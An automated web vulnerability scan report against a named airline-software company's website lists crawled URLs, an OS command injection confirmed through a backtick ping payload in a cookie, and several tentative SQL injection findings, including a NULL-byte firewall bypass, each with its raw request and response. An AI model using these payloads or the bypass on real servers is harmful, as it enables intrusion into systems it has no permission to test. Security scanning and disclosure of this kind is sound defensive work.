13.51. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/Sabre_AirVision_Market_Intelligence/

13.52. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology

13.53. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/airvision_technology/

13.54. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand

13.55. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_brand/

13.56. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit

13.57. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/build_profit/

13.58. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads

13.59. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/

13.60. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images

13.61. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/

13.62. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/downloads/images/pdf_icon.gif

13.63. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/

13.64. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/images/pdf_icon.gif

13.65. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list

13.66. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network

13.67. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/

13.68. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_revenue

13.69. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/airport

13.70. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/

13.71. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/

13.72. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/images/

13.73. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/images/pdf_icon.gif

13.74. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/manage_change/

13.75. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_crew/

13.76. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_flight/

13.77. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/sabre_aircentre_maintenance/

13.78. http://www.sabreairlinesolutions.com/home/products_services/product/corporate_management

13.79. http://www.sabreairlinesolutions.com/home/products_services/product/developer_tool

13.80. http://www.sabreairlinesolutions.com/home/products_services/product/electronic_ticketing_for_third-party_ground_handling

13.81. http://www.sabreairlinesolutions.com/home/products_services/product/frequent_flyer_management

13.82. http://www.sabreairlinesolutions.com/home/products_services/product/gds_electronic_ticketing

13.83. http://www.sabreairlinesolutions.com/home/products_services/product/interact_interface

13.84. http://www.sabreairlinesolutions.com/home/products_services/product/interline_electronic_ticketing_hub

13.85. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_flight_plan_manager

13.86. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_manager

13.87. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_gate_planner

13.88. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_load_manager

13.89. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_control

13.90. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_movement_manager

13.91. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_recovery_manager

13.92. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_roster_maker

13.93. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_admin

13.94. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_manager

13.95. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_staff_planner

13.96. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airport_data_intelligence

13.97. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_cargo_revenue_manager

13.98. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_codeshare_manager

13.99. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fares_manager

13.100. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_fleet_manager

13.101. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_ecommerce

13.102. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_group_manager

13.103. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_in-flight

13.104. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_network_manager

13.105. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_essentials

13.106. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_profit_manager

13.107. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_accounting

13.108. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_revenue_manager

13.109. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_schedule_manager

13.110. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_airvision_slot_manager_iata

13.111. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_emd_manager

13.112. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_gds_display_analysis

13.113. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_qik_analysis_system

13.114. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager

13.115. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_check-in

13.116. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_inventory

13.117. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_sell

13.118. http://www.sabreairlinesolutions.com/home/products_services/product/sabresonic_web

13.119. http://www.sabreairlinesolutions.com/home/products_services/product/web_services

13.120. http://www.sabreairlinesolutions.com/home/products_services/product_index/

13.121. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_fares_manager

13.122. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_network_manager

13.123. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_essentials

13.124. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_profit_manager

13.125. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_schedule_manager

13.126. http://www.sabreairlinesolutions.com/home/products_services/sabre_airvision_slot_manager_iata

13.127. http://www.sabreairlinesolutions.com/home/products_services/sabre_reaccommodation_manager



1. OS command injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/airline_reservations/sabresonic_res

Issue detail

The exp_tracker cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the exp_tracker cookie. The application took 36047 milliseconds to respond to the request, compared with 359 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands other than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:

Request

GET /home/products_services/airline_reservations/sabresonic_res HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D`ping%20-c%2020%20127.0.0.1`;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 06:01:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323028; expires=Thu, 06-Oct-2011 06:01:44 GMT; path=/
Set-Cookie: exp_last_activity=1286362904; expires=Thu, 06-Oct-2011 06:01:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 06:02:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2. SQL injection
There are 29 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/executive_team/greg_gilchrist

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/about/executive_team/greg_gilchrist?1%00'=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:26:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/about/executive_team/greg_gilchrist?1%00''=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:27:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321270; expires=Thu, 06-Oct-2011 01:27:05 GMT; path=/
Set-Cookie: exp_last_activity=1286346424; expires=Thu, 06-Oct-2011 01:27:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fabout%2Fexecutive_team%2Fgreg_gilchrist%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:27:14 GMT
Pragma: no-cache
Content-Length: 7888
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.2. http://www.sabreairlinesolutions.com/home/about/the_as_advantage/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/about/the_as_advantage/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home'/about/the_as_advantage/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:22:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home''/about/the_as_advantage/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 06 Oct 2010 01:22:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.3. http://www.sabreairlinesolutions.com/home/business_issues [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/business_issues

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/business_issues HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:20:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/business_issues HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:20:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286320657%27%27; expires=Thu, 06-Oct-2011 01:21:13 GMT; path=/
Set-Cookie: exp_last_activity=1286346070; expires=Thu, 06-Oct-2011 01:21:13 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fbusiness_issues%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:21:22 GMT
Pragma: no-cache
Content-Length: 7068
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.4. http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/my_list/ [exp_last_activity cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/commercial_planning/my_list/

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/commercial_planning/my_list/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:01:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/commercial_planning/my_list/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:01:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322977%27%27; expires=Thu, 06-Oct-2011 04:01:10 GMT; path=/
Set-Cookie: exp_last_activity=1286355668; expires=Thu, 06-Oct-2011 04:01:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 04:02:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.5. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations [exp_tracker cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D';

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D'';

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321275; expires=Thu, 06-Oct-2011 03:19:59 GMT; path=/
Set-Cookie: exp_last_activity=1286353199; expires=Thu, 06-Oct-2011 03:19:59 GMT; path=/
